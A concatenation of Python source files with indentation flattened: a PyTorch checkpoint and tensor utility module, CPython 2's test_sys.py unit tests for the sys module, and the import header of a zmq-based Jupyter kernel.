return [pad_id for _ in range(size[0])]
else:
return [create_pad(size[1:], pad_id) for _ in range(size[0])]
def create_tensor(idx: List, tensor_type) -> Tensor:
"""
Create torch tensor from index
Args:
idx: index list
tensor_type: type of tensor
Returns:
- a torch tensor created from index
"""
if tensor_type is int:
T = torch.LongTensor(idx)
elif tensor_type is float:
T = torch.FloatTensor(idx)
elif tensor_type is bool:
T = torch.BoolTensor(idx)
else:
raise TypeError
return T
def convert_tensor_to_idx(tensor: Tensor, bos: int = None, eos: int = None, pad: int = None):
"""
Convert a tensor to index.
Args:
tensor: original tensor
bos: begin-of-sequence index
eos: end-of-sequence index
pad: padding index
Returns:
- a nd list of indices
"""
idx = tensor.tolist()
    if bos is not None and eos is not None and pad is not None:  # pad is often 0, so test against None
idx = remove_special_tokens(idx, bos, eos, pad)
return idx
def remove_special_tokens(idx, bos: int, eos: int, pad: int):
"""
Remove special tokens from nd index list
Args:
idx: a nd index list
bos: begin-of-sequence index
eos: end-of-sequence index
pad: padding index
Returns:
- index list without special tokens
"""
if isinstance(idx, list) and isinstance(idx[0], int):
if idx[0] == bos:
idx = idx[1:]
eos_pos = find_eos(idx, eos)
if eos_pos is not None:
idx = idx[:eos_pos]
idx = [i for i in idx if i != pad]
return idx
else:
return [remove_special_tokens(i, bos, eos, pad) for i in idx]
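# Editor-added, hedged illustration (never called by this module): converting a decoded
# batch back to plain index lists while stripping bos/eos/pad.  The special-token ids
# used here are arbitrary assumptions, not values required by the module.
def _example_convert_tensor_to_idx():
    bos, eos, pad = 1, 2, 3
    tensor = torch.LongTensor([[1, 7, 8, 2, 3, 3],
                               [1, 9, 2, 3, 3, 3]])
    idx = convert_tensor_to_idx(tensor, bos=bos, eos=eos, pad=pad)
    # idx == [[7, 8], [9]]
    return idx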
def find_eos(idx: list, eos: int):
"""
Find eos position
Args:
idx: index list
eos: end-of-sequence index
Returns:
- position of eos
"""
for pos, i in enumerate(idx):
if i == eos:
return pos
return None
def _to_device(tensor, device, fp16=False):
"""
Move a tensor to device
Args:
tensor: original tensor
device: device name
fp16: whether to perform fp16
Returns:
- tensor on the given device
"""
if isinstance(tensor, torch.Tensor):
if device.startswith('cuda'):
tensor = tensor.cuda()
if isinstance(tensor, torch.FloatTensor) and fp16:
tensor = tensor.half()
elif device == 'cpu':
tensor = tensor.cpu()
return tensor
def half_samples(samples):
"""
    Randomly halve the given samples along the batch dimension
Args:
samples: samples to half
Returns:
- halved samples
"""
if isinstance(samples, List):
halved = []
is_dummy = False
for s in samples:
hs, dummy = half_samples(s)
is_dummy = dummy or is_dummy
halved.append(hs)
return halved, is_dummy
elif isinstance(samples, Dict):
t = get_example_obj(samples)
size = t.size(0)
idx = np.random.choice(list(range(size)), size // 2, replace=False)
if len(idx) > 0:
index = recursive(index_tensor)
return index(samples, idx), False
else:
dummy = recursive(dummy_tensor)
return dummy(samples), True
else:
raise NotImplementedError
def index_tensor(tensor, idx):
"""
    Select rows of a tensor by the given indices
Args:
tensor: original
idx: index to keep
Returns:
- tensor with selected row
"""
return tensor[idx]
def dummy_tensor(tensor):
size = tensor.size()
new_size = tuple([1 for _ in size[1:]])
tot = 1
for s in size:
tot *= s
tensor = tensor.view((tot, ) + new_size)
tensor = tensor[:1]
return tensor
def get_example_obj(x):
"""
    Get an example object from a List, Tuple or Dict
Args:
x: given object
Returns:
- an example object
"""
if isinstance(x, List) or isinstance(x, Tuple):
return get_example_obj(x[0])
elif isinstance(x, Dict):
for v in x.values():
return get_example_obj(v)
else:
return x
@contextmanager
def possible_autocast():
"""
Possibly perform autocast
"""
env = Environment()
if env.fp16:
with autocast():
yield
else:
yield
@singleton
class GradScalerSingleton:
"""
GradScaler for fp16 training
"""
def __init__(self) -> None:
self._grad_scaler = GradScaler()
def scale_loss(self, loss):
return self._grad_scaler.scale(loss)
def step(self, optimizer):
self._grad_scaler.step(optimizer)
def update(self):
self._grad_scaler.update()
def possible_scale_loss(loss):
"""
    Possibly scale the loss in fp16 training
"""
env = Environment()
if env.fp16:
grad_scaler = GradScalerSingleton()
return grad_scaler.scale_loss(loss)
else:
return loss
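# Editor-added, hedged sketch (never called by this module) of how possible_autocast,
# possible_scale_loss and GradScalerSingleton are meant to compose in one training step.
# `model`, `optimizer`, `samples` and `loss_fn` are caller-supplied placeholders.
def _example_fp16_step(model, optimizer, samples, loss_fn):
    with possible_autocast():
        loss = loss_fn(model(samples))
    possible_scale_loss(loss).backward()
    env = Environment()
    if env.fp16:
        scaler = GradScalerSingleton()
        scaler.step(optimizer)  # unscales the gradients before stepping the optimizer
        scaler.update()
    else:
        optimizer.step()
    optimizer.zero_grad()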
def save_avg_ckpt(last_ckpts, save_path, timeout=10000, wait=False):
def _save(ckpts, path, timeout=10000):
for ckpt in ckpts:
if not wait_until_exist(ckpt, timeout=timeout):
logger.info(f'timeout: {ckpt} not found')
return
time.sleep(10)
avg_state_dict = get_avg_ckpt(ckpts)
save_ckpt(avg_state_dict, path, wait=True)
if wait:
_save(last_ckpts, save_path, timeout)
else:
Process(target=_save, args=(last_ckpts, save_path, timeout)).start()
def save_ckpt(state_dict, path, retry=5, wait=False):
def _save(state_dict, path):
for _ in range(retry):
try:
tmp_path = os.path.join(TEMP_IO_SAVE_PATH, f"tmp.put.{path.split('/')[-1]}")
with open(tmp_path, 'wb') as fout:
torch.save(state_dict, fout)
if path.startswith('hdfs:'):
subprocess.run(["hadoop", "fs", "-put", "-f", tmp_path, path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.run(['rm', tmp_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
subprocess.run(["mv", tmp_path, path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
logger.info(f'successfully save state_dict to {path}')
break
except Exception as e:
logger.warning(f'saving checkpoint {path} fails: {e}')
state_dict = to_device(state_dict, 'cpu')
if wait:
_save(state_dict, path)
else:
Process(target=_save, args=(state_dict, path)).start()
def get_avg_ckpt(ckpt_paths, device='cpu'):
state_dict_list = []
for path in ckpt_paths:
if path.startswith('hdfs:'):
local_path = os.path.join(TEMP_IO_SAVE_PATH, f'tmp.get.{path.split("/")[-1]}')
subprocess.run(['hadoop', 'fs', '-get', path, local_path])
with open(local_path, 'rb') as fin:
state_dict_list.append(torch.load(fin, map_location='cpu')['model'])
subprocess.run(['rm', local_path])
else:
with open(path, 'rb') as fin:
state_dict_list.append(torch.load(fin, map_location='cpu')['model'])
state_dict = average_checkpoints(state_dict_list)
if device != 'cpu':
state_dict = {k: v.to(device) for k, v in state_dict.items()}
return {"model": state_dict}
def average_checkpoints(state_dict_list: List):
state_dict = OrderedDict()
for i, sd in enumerate(state_dict_list):
for key in sd:
p = sd[key]
if isinstance(p, torch.HalfTensor):
p = p.float()
if i == 0:
state_dict[key] = p.numpy()
else:
state_dict[key] = state_dict[key] + p.numpy()
ckpt_num = len(state_dict_list)
for key in state_dict:
state_dict[key] = state_dict[key] / ckpt_num
state_dict[key] = torch.from_numpy(state_dict[key])
return state_dict
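# Editor-added, hedged illustration (never called by this module): averaging two toy
# state dicts parameter-wise, as done when building an averaged checkpoint.
def _example_average_checkpoints():
    sd1 = OrderedDict([('w', torch.tensor([1.0, 3.0]))])
    sd2 = OrderedDict([('w', torch.tensor([3.0, 5.0]))])
    avg = average_checkpoints([sd1, sd2])
    # avg['w'] == tensor([2., 4.])
    return avg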
to_device = recursive(_to_device)
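# Editor-added, hedged usage note: `to_device` is the recursive wrapper around
# `_to_device`, so an arbitrarily nested dict/list of tensors can be moved in one call,
# as save_ckpt() above does with to_device(state_dict, 'cpu').
def _example_to_device(batch):
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    return to_device(batch, device)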
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, os, cStringIO
import struct
import operator
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.test_support.reap_children()
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is not None)
self.assertTrue(value is exc)
self.assertTrue(traceback is not None)
with test.test_support.check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is None)
self.assertTrue(value is None)
self.assertTrue(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assertTrue(typ1 is typ2)
self.assertTrue(value1 is exc)
self.assertTrue(value1 is value2)
self.assertTrue(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEqual(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
        # call with integer argument
try:
sys.exit(42)
except SystemExit, exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
        # call with tuple argument with one entry
        # entry will be unpacked
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEqual(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEqual(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (repr(stderr), repr(expected)))
        # test that the stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.test_support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.test_support.reap_threads
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, basestring)
self.assertIsInstance(sys.exec_prefix, basestring)
self.assertIsInstance(sys.executable, basestring)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.long_info), 2)
self.assertTrue(sys.long_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.long_info.sizeof_digit >= 1)
self.assertEqual(type(sys.long_info.bits_per_digit), int)
self.assertEqual(type(sys.long_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertIsInstance(sys.maxint, int)
if test.test_support.have_unicode:
self.assertIsInstance(sys.maxunicode, int)
self.assertIsInstance(sys.platform, basestring)
self.assertIsInstance(sys.prefix, basestring)
self.assertIsInstance(sys.version, basestring)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assertTrue(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
        # has been set to a nonexistent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assertIn(executable, ["''", repr(sys.executable)])
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
self.longdigit = sys.long_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
with test.test_support.check_py3k_warnings():
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '7P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
check(get_cell().func_code, size(h + '4i8Pi3P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3P3i'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh))
check(1L, size(vh) + self.longdigit)
check(-1L, size(vh) + self.longdigit)
PyLong_BASE = 2**sys.long_info.bits_per_digit
check(long(PyLong_BASE), size(vh) + 2*self.longdigit)
check(long(PyLong_BASE**2-1), size(vh) + 2*self.longdigit)
check(long(PyLong_BASE**2), size(vh) + 3*self.longdigit)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# PyCapsule
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', struct.calcsize(vh + 'li') + 1)
check('abc', struct.calcsize(vh + 'li') + 1 + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
jupyter_kernel.py
|
# Originally based on simple_kernel.py
# by Doug Blank <doug.blank@gmail.com>
#
# To adjust debug output, set debug_level to:
# 0 - show no debugging information
# 1 - shows basic running information
# 2 - also shows loop details
# 3 - also shows message details
#
from __future__ import print_function
## General Python imports:
import sys
import os
import json
import hmac
import uuid
import errno
import hashlib
import datetime
import threading
from pprint import pformat
# zmq specific imports:
import zmq
from zmq.eventloop import ioloop, zmqstream
from zmq.error import ZMQError
PYTHON3 = sys.version_info.major == 3
# Globals:
DELIM = b"<IDS|MSG>"
debug_level = 1 # 0 (none) to 3 (all) for various levels of detail
